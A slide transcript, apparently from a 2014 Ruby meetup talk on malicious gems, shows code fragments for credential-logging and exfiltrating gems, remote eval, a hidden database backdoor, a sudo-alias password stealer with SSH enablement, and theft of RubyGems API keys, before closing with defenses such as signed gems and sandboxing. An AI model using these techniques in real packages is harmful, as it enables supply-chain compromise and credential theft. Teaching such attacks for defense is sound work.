Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking with Gems (denver.rb)

Avatar for Benjamin Smith Benjamin Smith
August 13, 2014
Technology
0
170

Hacking with Gems (denver.rb)

Avatar for Benjamin Smith

Benjamin Smith

August 13, 2014
Tweet

More Decks by Benjamin Smith

See All by Benjamin Smith
Modules instead of Microservies
Avatar for Benjamin Smith benjaminleesmith
0
99
Refactoring Rails Apps with Engines
Avatar for Benjamin Smith benjaminleesmith
4
860
How I architected my big Rails app for success! (ConFoo 2014)
Avatar for Benjamin Smith benjaminleesmith
1
240
Hacking with Gems (ConFoo 2014)
Avatar for Benjamin Smith benjaminleesmith
1
120
How I architected my big Rails app for success! (RubyConfAU 2014)
Avatar for Benjamin Smith benjaminleesmith
2
390
How I architected my big Rails app for success! (RMR 2013)
Avatar for Benjamin Smith benjaminleesmith
4
400
Keeping Your Massive Rails App From Turning Into a S#!t Show (WindyCityRails 2013)
Avatar for Benjamin Smith benjaminleesmith
1
250
Architecting your Rails app for success! (EuRuKo 2013)
Avatar for Benjamin Smith benjaminleesmith
4
1.3k
Hacking with Gems (RuLu 2013)
Avatar for Benjamin Smith benjaminleesmith
3
1.5k

Other Decks in Technology

See All in Technology
「全員プロダクトマネージャー」を実現する、Cursorによる仕様検討の自動運転
Avatar for Michiru Kato applism118
22
12k
2025年夏 コーディングエージェントを統べる者
Avatar for nwiizo nwiizo
0
180
職種の壁を溶かして開発サイクルを高速に回す~情報透明性と職種越境から考えるAIフレンドリーな職種間連携~
Avatar for daitasu daitasu
0
170
AIのグローバルトレンド2025 #scrummikawa / global ai trend
Avatar for kyonmm kyonmm
PRO
1
300
20250910_障害注入から効率的復旧へ_カオスエンジニアリング_生成AIで考えるAWS障害対応.pdf
Avatar for sh_fk2 sh_fk2
3
260
Agile PBL at New Grads Trainings
Avatar for Yasunobu Kawaguchi kawaguti
PRO
1
440
Platform開発が先行する Platform Engineeringの違和感
Avatar for KintoTech_Dev kintotechdev
4
580
5年目から始める Vue3 サイト改善 #frontendo
Avatar for Kihara, Takuya tacck
PRO
3
230
AWSを利用する上で知っておきたい名前解決のはなし(10分版)
Avatar for nagisa_53 nagisa53
10
3.2k
TS-S205_昨年対比2倍以上の機能追加を実現するデータ基盤プロジェクトでのAI活用について
Avatar for K.Mitsuhashi kaz3284
1
210
roppongirb_20250911
Avatar for Kuniaki IGARASHI igaiga
1
240
下手な強制、ダメ!絶対! 「ガードレール」を「檻」にさせない"ガバナンス"の取り方とは?
Avatar for Masataka Tsukamoto tsukaman
2
450

Featured

See All Featured
Large-scale JavaScript Application Architecture
Avatar for Addy Osmani addyosmani
513
110k
The Web Performance Landscape in 2024 [PerfNow 2024]
Avatar for Tammy Everts tammyeverts
9
810
Making the Leap to Tech Lead
Avatar for Ryan Cromwell cromwellryan
135
9.5k
Helping Users Find Their Own Way: Creating Modern Search Experiences
Avatar for Dan Newman danielanewman
29
2.9k
Optimizing for Happiness
Avatar for Tom Preston-Werner mojombo
379
70k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
Avatar for Kevin Liebholz kevinliebholz
34
6k
Measuring & Analyzing Core Web Vitals
Avatar for Philip Tellis bluesmoon
9
580
Balancing Empowerment & Direction
Avatar for Lara Hogan lara
3
620
Building Applications with DynamoDB
Avatar for Matt Wood mza
96
6.6k
4 Signs Your Business is Dying
Avatar for Josh Pigford shpigford
184
22k
Why You Should Never Use an ORM
Avatar for John Nunemaker jnunemaker
PRO
59
9.5k
Unsuck your backbone
Avatar for Amy Palamountain ammeep
671
58k

Transcript

  1. Hacking with Gems Benjamin Smith @benjamin_smith

  2. How to punk your friends with gems Benjamin Smith @benjamin_smith

  3. How-to get rich quick and (maybe) not go to jail!

    Benjamin Smith @benjamin_smith

  4. Four reasons you should NOT trust Benjamin Smith @benjamin_smith

  5. None

  6. who i am

  7. who i am

  8. who i am

  9. what i am NOT

  10. None

  11. please do not try this at home

  12. please do not try this at home

  13. None
  14. None

  15. Lawful Evil Lawful Good

  16. Lawful Evil Lawful Good

  17. Lawful Evil Lawful Good

  18. Lawful Evil Lawful Good

  19. once upon a time

  20. GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview

    (= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)

  21. what’s the worst that could happen?

  22. None

  23. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  24. before... github.com/benjaminleesmith/awesome-rails-flash-messages

  25. after! github.com/benjaminleesmith/awesome-rails-flash-messages

  26. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  27. ... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

  28. ?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

  29. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  30. i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages

  31. “development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

  32. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

  33. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit

  34. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4:

  35. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

  36. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

  37. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

  38. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

  39. a one way ticket to

  40. that was easy. what else can I do?

  41. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

  42. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector

  43. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  44. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  45. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  46. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

  47. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  48. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  49. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  50. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  51. /users/sign_in github.com/benjaminleesmith/net_http_detector

  52. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

  53. hello db access! github.com/benjaminleesmith/net_http_detector

  54. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

  55. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

  56. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

  57. careful of wolves in sheep’s clothing

  58. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5:

  59. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5:

  60. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

  61. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

  62. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

  63. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

  64. i like the beach

  65. that was easy. what else can I do?

  66. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

  67. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
  68. None

  69. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

  70. better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0

    8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s

  71. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s

  72. what what github.com/benjaminleesmith/better_date_to_s

  73. i can haz source github.com/benjaminleesmith/better_date_to_s

  74. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

  75. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

  76. that was easy hard. what else can I do? (that's

    easier)

  77. gem install bunlder

  78. gem install be_truthy github.com/benjaminleesmith/be_truthy

  79. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy

  80. what it ACTUALLY does github.com/benjaminleesmith/be_truthy

  81. github.com/benjaminleesmith/be_truthy

  82. file tree looks ok github.com/benjaminleesmith/be_truthy

  83. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

  84. but what was this? github.com/benjaminleesmith/be_truthy

  85. I see no C github.com/benjaminleesmith/be_truthy

  86. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy

  87. there is no Rakefile github.com/benjaminleesmith/be_truthy

  88. the real file tree github.com/benjaminleesmith/be_truthy

  89. the real file tree github.com/benjaminleesmith/be_truthy

  90. what does the Rakefile do? github.com/benjaminleesmith/be_truthy

  91. sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

  92. File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy

  93. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

  94. what does "sudo" do now? github.com/benjaminleesmith/be_truthy

  95. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  96. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  97. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  98. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  99. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

  100. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy

  101. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

  102. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

  103. take away: don't install ben's gems

  104. None

  105. how could I get you to install my gems?

  106. what gems are trustworthy?

  107. how can I add my code to already trusted gems?

  108. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy

  109. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  110. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  111. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  112. now I own your gems github.com/benjaminleesmith/be_truthy

  113. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy

  114. do people trust your gems?

  115. do people who install your gems have trustworthy gems?

  116. None

  117. there’s still one problem

  118. bootstrapping

  119. being popular sucks

  120. conferences

  121. social engineering

  122. None
  123. None
  124. None

  125. so what happens now?

  126. ruby gems goes down

  127. heroku deploys go down

  128. i go to the beach

  129. ruby gems goes down

  130. heroku deploys go down

  131. recovery

  132. so what now?

  133. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  134. Little Snitch obdev.at/products/littlesnitch/index.html

  135. gem install be_truthy github.com/benjaminleesmith/be_truthy

  136. fseventer fernlightning.com/doku.php?id=software:fseventer:start

  137. don’t “gem install” from strangers

  138. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
  139. None
  140. None

  141. curl -sSL https://get.rvm.io | bash

  142. gem install rails -P HighSecurity

  143. > gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR:

    While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy

  144. gem cert --build

  145. https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html

  146. sandboxing

  147. github.com/rubygems/rubygems

  148. tools to detect malicious code

  149. private gem repos

  150. do not try this at home

  151. don't install gems you don't need to

  152. pay attention to what your gems do

  153. monitor your system

  154. read the source

  155. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

  156. on install github.com/benjaminleesmith/coal-mine-canary

  157. the results github.com/benjaminleesmith/coal-mine-canary

  158. thank you!

  159. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

  160. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

  161. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith